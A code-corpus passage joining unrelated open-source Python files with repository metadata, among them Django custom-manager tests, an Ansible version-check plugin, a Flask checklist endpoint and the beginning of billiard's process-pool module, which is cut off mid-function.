def setUpTestData(cls):
cls.b1 = Book.published_objects.create(
title="How to program", author="Rodney Dangerfield", is_published=True)
cls.b2 = Book.published_objects.create(
title="How to be smart", author="Albert Einstein", is_published=False)
cls.p1 = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
cls.droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
def test_custom_manager_basic(self):
"""
Test a custom Manager method.
"""
self.assertQuerysetEqual(
Person.objects.get_fun_people(), [
"Bugs Bunny"
],
str
)
def test_queryset_copied_to_default(self):
"""
The methods of a custom QuerySet are properly copied onto the
default Manager.
"""
for manager_name in self.custom_manager_names:
with self.subTest(manager_name=manager_name):
manager = getattr(Person, manager_name)
# Public methods are copied
manager.public_method()
# Private methods are not copied
with self.assertRaises(AttributeError):
manager._private_method()
def test_manager_honors_queryset_only(self):
for manager_name in self.custom_manager_names:
with self.subTest(manager_name=manager_name):
manager = getattr(Person, manager_name)
# Methods with queryset_only=False are copied even if they are private.
manager._optin_private_method()
# Methods with queryset_only=True aren't copied even if they are public.
msg = "%r object has no attribute 'optout_public_method'" % manager.__class__.__name__
with self.assertRaisesMessage(AttributeError, msg):
manager.optout_public_method()
def test_manager_use_queryset_methods(self):
"""
Custom manager will use the queryset methods
"""
for manager_name in self.custom_manager_names:
with self.subTest(manager_name=manager_name):
manager = getattr(Person, manager_name)
queryset = manager.filter()
self.assertQuerysetEqual(queryset, ["Bugs Bunny"], str)
self.assertIs(queryset._filter_CustomQuerySet, True)
# Specialized querysets inherit from our custom queryset.
queryset = manager.values_list('first_name', flat=True).filter()
self.assertEqual(list(queryset), ["Bugs"])
self.assertIs(queryset._filter_CustomQuerySet, True)
self.assertIsInstance(queryset.values(), CustomQuerySet)
self.assertIsInstance(queryset.values().values(), CustomQuerySet)
self.assertIsInstance(queryset.values_list().values(), CustomQuerySet)
def test_init_args(self):
"""
The custom manager __init__() argument has been set.
"""
self.assertEqual(Person.custom_queryset_custom_manager.init_arg, 'hello')
def test_manager_attributes(self):
"""
Custom manager method is only available on the manager and not on
querysets.
"""
Person.custom_queryset_custom_manager.manager_only()
msg = "'CustomQuerySet' object has no attribute 'manager_only'"
with self.assertRaisesMessage(AttributeError, msg):
Person.custom_queryset_custom_manager.all().manager_only()
def test_queryset_and_manager(self):
"""
Queryset method doesn't override the custom manager method.
"""
queryset = Person.custom_queryset_custom_manager.filter()
self.assertQuerysetEqual(queryset, ["Bugs Bunny"], str)
self.assertIs(queryset._filter_CustomManager, True)
def test_related_manager(self):
"""
The related managers extend the default manager.
"""
self.assertIsInstance(self.droopy.books, PublishedBookManager)
self.assertIsInstance(self.b2.authors, PersonManager)
def test_no_objects(self):
"""
The default manager, "objects", doesn't exist, because a custom one
was provided.
"""
msg = "type object 'Book' has no attribute 'objects'"
with self.assertRaisesMessage(AttributeError, msg):
Book.objects
def test_filtering(self):
"""
Custom managers respond to usual filtering methods
"""
self.assertQuerysetEqual(
Book.published_objects.all(), [
"How to program",
],
lambda b: b.title
)
def test_fk_related_manager(self):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
self.assertQuerysetEqual(
self.b1.favorite_books.order_by('first_name').all(), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.fun_people_favorite_books.all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='fun_people').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
def test_gfk_related_manager(self):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
self.assertQuerysetEqual(
self.b1.favorite_things.all(), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.fun_people_favorite_things.all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='fun_people').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
def test_m2m_related_manager(self):
bugs = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.authors.add(bugs)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.authors.add(droopy)
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.fun_authors.add(bugs)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.fun_authors.add(droopy)
self.assertQuerysetEqual(
self.b1.authors.order_by('first_name').all(), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.fun_authors.order_by('first_name').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='fun_people').all(), [
"Bugs",
],
lambda c: c.first_name,
ordered=False,
)
def test_removal_through_default_fk_related_manager(self, bulk=True):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
self.b1.fun_people_favorite_books.remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.filter(favorite_book=self.b1), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.b1.fun_people_favorite_books.remove(bugs, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.filter(favorite_book=self.b1), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
bugs.favorite_book = self.b1
bugs.save()
self.b1.fun_people_favorite_books.clear(bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.filter(favorite_book=self.b1), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_default_fk_related_manager(self):
self.test_removal_through_default_fk_related_manager(bulk=False)
def test_removal_through_specified_fk_related_manager(self, bulk=True):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_book=self.b1)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_book=self.b1)
# The fun manager DOESN'T remove boring people.
self.b1.favorite_books(manager='fun_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.favorite_books(manager='boring_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
droopy.favorite_book = self.b1
droopy.save()
# The fun manager ONLY clears fun people.
self.b1.favorite_books(manager='fun_people').clear(bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_books(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_specified_fk_related_manager(self):
self.test_removal_through_specified_fk_related_manager(bulk=False)
def test_removal_through_default_gfk_related_manager(self, bulk=True):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
self.b1.fun_people_favorite_things.remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.order_by('first_name').filter(favorite_thing_id=self.b1.pk), [
"Bugs",
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.b1.fun_people_favorite_things.remove(bugs, bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.order_by('first_name').filter(favorite_thing_id=self.b1.pk), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
bugs.favorite_book = self.b1
bugs.save()
self.b1.fun_people_favorite_things.clear(bulk=bulk)
self.assertQuerysetEqual(
FunPerson._base_manager.order_by('first_name').filter(favorite_thing_id=self.b1.pk), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_default_gfk_related_manager(self):
self.test_removal_through_default_gfk_related_manager(bulk=False)
def test_removal_through_specified_gfk_related_manager(self, bulk=True):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
# The fun manager DOESN'T remove boring people.
self.b1.favorite_things(manager='fun_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.favorite_things(manager='boring_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
droopy.favorite_thing = self.b1
droopy.save()
# The fun manager ONLY clears fun people.
self.b1.favorite_things(manager='fun_people').clear(bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_specified_gfk_related_manager(self):
self.test_removal_through_specified_gfk_related_manager(bulk=False)
def test_removal_through_default_m2m_related_manager(self):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.fun_authors.add(bugs)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.fun_authors.add(droopy)
self.b1.fun_authors.remove(droopy)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Bugs",
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.remove(bugs)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.add(bugs)
self.b1.fun_authors.clear()
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
def test_removal_through_specified_m2m_related_manager(self):
bugs = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.authors.add(bugs)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.authors.add(droopy)
# The fun manager DOESN'T remove boring people.
self.b1.authors(manager='fun_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.authors(manager='boring_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
self.b1.authors.add(droopy)
# The fun manager ONLY clears fun people.
self.b1.authors(manager='fun_people').clear()
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.authors(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_deconstruct_default(self):
mgr = models.Manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'django.db.models.manager.Manager')
self.assertEqual(args, ())
self.assertEqual(kwargs, {})
def test_deconstruct_as_manager(self):
mgr = CustomQuerySet.as_manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertTrue(as_manager)
self.assertEqual(qs_path, 'custom_managers.models.CustomQuerySet')
def test_deconstruct_from_queryset(self):
mgr = DeconstructibleCustomManager('a', 'b')
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('a', 'b',))
self.assertEqual(kwargs, {})
mgr = DeconstructibleCustomManager('x', 'y', c=3, d=4)
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('x', 'y',))
self.assertEqual(kwargs, {'c': 3, 'd': 4})
def test_deconstruct_from_queryset_failing(self):
mgr = CustomManager('arg')
msg = ("Could not find manager BaseCustomManagerFromCustomQuerySet in "
"django.db.models.manager.\n"
"Please note that you need to inherit from managers you "
"dynamically generated with 'from_queryset()'.")
with self.assertRaisesMessage(ValueError, msg):
mgr.deconstruct()
def test_abstract_model_with_custom_manager_name(self):
"""
A custom manager may be defined on an abstract model.
It will be inherited by the abstract model's children.
"""
PersonFromAbstract.abstract_persons.create(objects='Test')
self.assertQuerysetEqual(
PersonFromAbstract.abstract_persons.all(), ["Test"],
lambda c: c.objects,
)
class TestCars(TestCase):
def test_managers(self):
# Each model class gets a "_default_manager" attribute, which is a
# reference to the first manager defined in the class.
Car.cars.create(name="Corvette", mileage=21, top_speed=180)
Car.cars.create(name="Neon", mileage=31, top_speed=100)
self.assertQuerysetEqual(
Car._default_manager.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
Car.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
# alternate manager
self.assertQuerysetEqual(
Car.fast_cars.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit default manager
self.assertQuerysetEqual(
FastCarAsDefault.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsDefault._default_manager.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit base manager
self.assertQuerysetEqual(
FastCarAsBase.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsBase._base_manager.all(), [
"Corvette",
],
lambda c: c.name
)
class CustomManagersRegressTestCase(TestCase):
def test_filtered_default_manager(self):
"""Even though the default manager filters out some records,
we must still be able to save (particularly, save by updating
existing records) those filtered instances. This is a
regression test for #8990, #9527"""
related = RelatedModel.objects.create(name="xyzzy")
obj = RestrictedModel.objects.create(name="hidden", related=related)
obj.name = "still hidden"
obj.save()
# If the hidden object wasn't seen during the save process,
# there would now be two objects in the database.
self.assertEqual(RestrictedModel.plain_manager.count(), 1)
def test_refresh_from_db_when_default_manager_filters(self):
"""
Model.refresh_from_db() works for instances hidden by the default
manager.
"""
book = Book._base_manager.create(is_published=False)
Book._base_manager.filter(pk=book.pk).update(title='Hi')
book.refresh_from_db()
self.assertEqual(book.title, 'Hi')
def test_save_clears_annotations_from_base_manager(self):
"""Model.save() clears annotations from the base manager."""
self.assertEqual(Book._meta.base_manager.name, 'annotated_objects')
book = Book.annotated_objects.create(title='Hunting')
Person.objects.create(
first_name='Bugs', last_name='Bunny', fun=True,
favorite_book=book, favorite_thing_id=1,
)
book = Book.annotated_objects.first()
self.assertEqual(book.favorite_avg, 1) # Annotation from the manager.
book.title = 'New Hunting'
# save() fails if annotations that involve related fields aren't
# cleared before the update query.
book.save()
self.assertEqual(Book.annotated_objects.first().title, 'New Hunting')
def test_delete_related_on_filtered_manager(self):
"""Deleting related objects should also not be distracted by a
restricted manager on the related object. This is a regression
test for #2698."""
related = RelatedModel.objects.create(name="xyzzy")
for name, public in (('one', True), ('two', False), ('three', False)):
RestrictedModel.objects.create(name=name, is_public=public, related=related)
obj = RelatedModel.objects.get(name="xyzzy")
obj.delete()
# All of the RestrictedModel instances should have been
# deleted, since they *all* pointed to the RelatedModel. If
# the default manager is used, only the public one will be
# deleted.
self.assertEqual(len(RestrictedModel.plain_manager.all()), 0)
def test_delete_one_to_one_manager(self):
# The same test case as the last one, but for one-to-one
# models, which are implemented slightly different internally,
# so it's a different code path.
obj = RelatedModel.objects.create(name="xyzzy")
OneToOneRestrictedModel.objects.create(name="foo", is_public=False, related=obj)
obj = RelatedModel.objects.get(name="xyzzy")
obj.delete()
self.assertEqual(len(OneToOneRestrictedModel.plain_manager.all()), 0)
def test_queryset_with_custom_init(self):
"""
BaseManager.get_queryset() should use kwargs rather than args to allow
custom kwargs (#24911).
"""
qs_custom = Person.custom_init_queryset_manager.all()
qs_default = Person.objects.all()
self.assertQuerysetEqual(qs_custom, qs_default)
|
nesdis/djongo
|
tests/django_tests/tests/v22/tests/custom_managers/tests.py
|
Python
|
agpl-3.0
| 25,648 | 0.001716 |
def hello_world():
"Function that says hello."
print("Hello, world!")
|
evanmiltenburg/python-for-text-analysis
|
Extra_Material/Examples/Separate_Files/main_dir_script.py
|
Python
|
apache-2.0
| 78 | 0 |
#!/usr/bin/env python
from runtest import TestBase
class TestCase(TestBase):
def __init__(self):
TestBase.__init__(self, 'abc', """
# DURATION TID FUNCTION
62.202 us [28141] | __cxa_atexit();
[28141] | main() {
[28141] | a() {
[28141] | b() {
[28141] | c() {
0.753 us [28141] | getpid();
1.430 us [28141] | } /* c */
1.915 us [28141] | } /* b */
2.405 us [28141] | } /* a */
3.005 us [28141] | } /* main */
""")
|
namhyung/uftrace
|
tests/t001_basic.py
|
Python
|
gpl-2.0
| 530 | 0.001887 |
# -*- coding: utf8 -*-
"""
The ``dbs`` module
===================
Contains all functions needed to access the main site database or any SQLite database in a secure way
"""
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.sql import join
__all__ = ['join', 'create_engine_session', 'auto_map_orm']
def create_engine_session(engine_url, echo=True):
"""
    Create a SQLAlchemy engine and an associated session.
    ``engine_url`` is an RFC 1738 compliant database URL, see
    http://docs.sqlalchemy.org/en/latest/dialects/index.html
    :param engine_url: database URL passed to ``create_engine``
    :param echo: when True, emitted SQL statements are logged
    :return: ``(engine, session)`` tuple
"""
engine = sqlalchemy.create_engine(engine_url, echo=echo)
session_class = sessionmaker(bind=engine)
session = session_class()
return engine, session
def auto_map_orm(engine):
    base_class = automap_base()
    base_class.prepare(engine, reflect=True)
    return base_class
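# Usage sketch (added illustration; the in-memory SQLite URL is only an example):
if __name__ == "__main__":
    engine, session = create_engine_session("sqlite://", echo=False)
    base = auto_map_orm(engine)  # reflected tables appear as base.classes.<table_name>
    session.close()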
|
salas106/lahorie
|
lahorie/utils/sql.py
|
Python
|
mit
| 886 | 0.002257 |
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible import __version__
from ansible.errors import AnsibleError
from distutils.version import LooseVersion
from operator import eq, ge, gt
from sys import version_info
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
version_requirement = '2.5.0.0'
version_tested_max = '2.7.5'
python3_required_version = '2.5.3'
if version_info[0] == 3 and not ge(LooseVersion(__version__), LooseVersion(python3_required_version)):
raise AnsibleError(('Ansible >= {} is required when using Python 3.\n'
'Either downgrade to Python 2 or update your Ansible version to {}.').format(python3_required_version, python3_required_version))
if not ge(LooseVersion(__version__), LooseVersion(version_requirement)):
raise AnsibleError(('Trellis no longer supports Ansible {}.\n'
'Please upgrade to Ansible {} or higher.').format(__version__, version_requirement))
elif gt(LooseVersion(__version__), LooseVersion(version_tested_max)):
    display.warning(u'Your Ansible version is {} but this version of Trellis has only been tested for '
                    u'compatibility with Ansible {} -> {}. It is advisable to check for Trellis updates or '
u'downgrade your Ansible version.'.format(__version__, version_requirement, version_tested_max))
if eq(LooseVersion(__version__), LooseVersion('2.5.0')):
    display.warning(u'Your Ansible version is {}. Consider upgrading your Ansible version to avoid '
u'erroneous warnings such as `Removed restricted key from module data...`'.format(__version__))
# Import BaseVarsPlugin after Ansible version check.
# Otherwise import error for Ansible versions older than 2.4 would prevent display of version check message.
from ansible.plugins.vars import BaseVarsPlugin
class VarsModule(BaseVarsPlugin):
def get_vars(self, loader, path, entities, cache=True):
return {}
|
jeffstieler/bedrock-ansible
|
lib/trellis/plugins/vars/version.py
|
Python
|
mit
| 2,048 | 0.007324 |
from gasistafelice.rest.views.blocks.base import BlockWithList
from django.utils.translation import ugettext as _, ugettext_lazy as _lazy
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
class Block(BlockWithList):
BLOCK_NAME = "account_state"
BLOCK_DESCRIPTION = _("Economic state")
BLOCK_VALID_RESOURCE_TYPES = ["gas", "site"]
def _get_resource_list(self, request):
return request.resource.accounts
# TODO fero CHECK
# THIS IS USEFUL FOR USER ACTIONS: add/update/delete
# # Calculate allowed user actions
# #
# user_actions = []
#
# if settings.CAN_CHANGE_CONFIGURATION_VIA_WEB == True:
# user = request.user
# if can_write_to_resource(user,res):
# if resource_type in ['container', 'node', 'target', 'measure']:
#
# if (resource_type in ['target', 'measure']):
# if res.suspended:
# user_actions.append('resume')
# else:
# user_actions.append('suspend')
# else:
# user_actions.append('resume')
# user_actions.append('suspend')
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# elif args == "new_note":
# return self.add_new_note(request, resource_type, resource_id)
# elif args == "remove_note":
# return self.remove_note(request, resource_type, resource_id)
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# def add_new_note(self,request, resource_type, resource_id):
# resource = request.resource
#
# if request.POST:
#
# #title = request.REQUEST.get('title');
# body = request.REQUEST.get('body');
#
# new_comment = Comment(content_object = resource
# ,site = DjangoSite.objects.all()[0]
# ,user = request.user
# ,user_name = request.user.username
# ,user_email = request.user.email
# ,user_url = ''
# ,comment = body
# ,ip_address = None
# ,is_public = True
# ,is_removed = False
# )
#
# new_comment.save()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
#
# return HttpResponse('')
#
# #------------------------------------------------------------------------------#
# # #
# #------------------------------------------------------------------------------#
#
# def remove_note(self, request, resource_type, resource_id):
#
# resource = request.resource
#
# note_id = request.REQUEST.get('note_id')
#
# note = Comment.objects.get(id=note_id)
# note.delete()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
|
OrlyMar/gasistafelice
|
gasistafelice/rest/views/blocks/account_state.py
|
Python
|
agpl-3.0
| 3,887 | 0.009262 |
import unittest
import os
from test.aiml_tests.client import TestClient
from programy.config.brain import BrainFileConfiguration
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_configuration(self, arguments):
super(BasicTestClient, self).load_configuration(arguments)
self.configuration.brain_configuration._aiml_files = BrainFileConfiguration(files=os.path.dirname(__file__))
self.configuration.brain_configuration._person = os.path.dirname(__file__)+"/person.txt"
class PersonAIMLTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
PersonAIMLTests.test_client = BasicTestClient()
def test_person(self):
response = PersonAIMLTests.test_client.bot.ask_question("test", "TEST PERSON")
self.assertIsNotNone(response)
self.assertEqual(response, "This is your2 cat")
|
dkamotsky/program-y
|
src/test/aiml_tests/person_tests/test_person_aiml.py
|
Python
|
mit
| 904 | 0.005531 |
#!/usr/bin/python
########################################################################
# 1 August 2014
# Patrick Lombard, Centre for Stem Stem Research
# Core Bioinformatics Group
# University of Cambridge
# All right reserved.
########################################################################
import pychiptools.call_diff_bind
pychiptools.call_diff_bind.main()
|
pdl30/pychiptools
|
scripts/pychip_diff_bind.py
|
Python
|
gpl-2.0
| 376 | 0 |
from flask import request
from flask_restplus import Resource
from skf.api.security import security_headers, validate_privilege
from skf.api.checklist_category.business import update_checklist_category
from skf.api.checklist_category.serializers import checklist_type_update, message
from skf.api.kb.parsers import authorization
from skf.api.restplus import api
from skf.api.security import log, val_num, val_alpha, val_alpha_num, val_alpha_num_special
ns = api.namespace('checklist_category', description='Operations related to checklist items')
@ns.route('/update/<int:id>')
@api.doc(params={'id': 'The checklist category id'})
@api.response(404, 'Validation error', message)
class ChecklistCategoryUpdate(Resource):
@api.expect(authorization, checklist_type_update)
@api.response(400, 'No results found', message)
def put(self, id):
"""
        Update a checklist category.
* Privileges required: **edit**
"""
data = request.json
val_num(id)
val_alpha_num_special(data.get('name'))
val_alpha_num_special(data.get('description'))
validate_privilege(self, 'edit')
result = update_checklist_category(id, data)
return result, 200, security_headers()
|
blabla1337/skf-flask
|
skf/api/checklist_category/endpoints/checklist_category_update.py
|
Python
|
agpl-3.0
| 1,240 | 0.003226 |
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import pickle_loads, reset_signals, restart_state
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = signal.SIGTERM
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
SIGMAP = dict(
(getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG')
)
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def human_status(status):
if (status or 0) < 0:
try:
return 'signal {0} ({1})'.format(-status, SIGMAP[-status])
except KeyError:
return 'signal {0}'.format(-status)
return 'exitcode {0}'.format(status)
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def __init__(self, value=1, verbose=None):
if PY3:
_Semaphore.__init__(self, value)
else:
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
if PY3:
cond = self._cond
else:
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
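# Hedged behaviour sketch (editor's addition, not in the original source): the
# semaphore above silently ignores release() calls that would push the counter
# past its initial value, while grow()/shrink() adjust that bound itself.
# For example, assuming an initial value of 2:
#
#   sem = LaxBoundedSemaphore(2)
#   sem.acquire(); sem.acquire()   # counter 2 -> 0
#   sem.release(); sem.release()   # counter back to 2
#   sem.release()                  # no-op: already at the initial value
#   sem.grow()                     # raise the bound by one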
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
